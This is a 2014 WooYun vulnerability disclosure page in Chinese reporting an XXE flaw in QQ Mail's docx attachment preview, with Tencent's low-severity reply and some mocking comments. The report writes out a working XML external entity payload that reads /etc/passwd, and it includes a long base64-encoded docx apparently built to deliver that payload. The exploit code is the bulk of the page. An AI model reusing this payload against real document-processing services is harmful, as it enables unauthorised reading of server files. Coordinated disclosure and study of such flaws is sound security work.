当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-073439

漏洞标题:QQ邮箱XXE可读取任意文件

相关厂商:腾讯

漏洞作者: 路人甲

提交时间:2014-08-22 13:10

修复时间:2014-10-06 13:12

公开时间:2014-10-06 13:12

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-08-22: 细节已通知厂商并且等待厂商处理中
2014-08-22: 厂商已经确认,细节仅向厂商公开
2014-09-01: 细节向核心白帽子及相关领域专家公开
2014-09-11: 细节向普通白帽子公开
2014-09-21: 细节向实习白帽子公开
2014-10-06: 细节向公众公开

简要描述:

QQ邮箱XXE可导致系统文件泄漏

详细说明:

附件预览对docx文件处理不当。
解开docx文件,修改word/document.xml:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE ANY [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<w:document xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml"><w:body><w:p w:rsidR="00864BB8" w:rsidRDefault="00630334"><w:r><w:t>test &xxe;</w:t></w:r></w:p><w:sectPr w:rsidR="00864BB8" w:rsidSect="00864BB8"><w:pgSz w:w="11906" w:h="16838"/><w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/><w:cols w:space="708"/><w:docGrid w:linePitch="360"/></w:sectPr></w:body></w:document>


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
AAAAUEsFBgAAAAAQABAAUQUAANIcAAAAAA==

漏洞证明:

qq.png

修复方案:

你们比我懂

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2014-08-22 16:14

厂商回复:

非常感谢您的报告。该问题已经通过其它渠道发现并已着手处理。如您有进一步发现,请及时与我们联系。如果您有任何的疑问,欢迎反馈,我们会有专人跟进处理。

最新状态:

暂无

漏洞评价:

评论

  1. 2014-08-22 16:56 | 黑色的屌丝 ( 路人 | Rank:27 漏洞数:5 | →_→→_→)

    非常感谢您的报告。该问题已经通过其它渠道发现并已着手处理。如您有进一步发现,请及时与我们联系。如果您有任何的疑问,欢迎反馈,我们会有专人跟进处理。

  2. 2014-08-22 19:41 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    不要脸

  3. 2014-08-23 01:09 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    rank 1 - -#

  4. 2014-08-24 12:27 | 刺丶魂 ( 路人 | Rank:17 漏洞数:9 )

    非常感谢您的报告。该问题已经通过其它渠道发现并已着手处理。如您有进一步发现,请及时与我们联系。如果您有任何的疑问,欢迎反馈,我们会有专人跟进处理。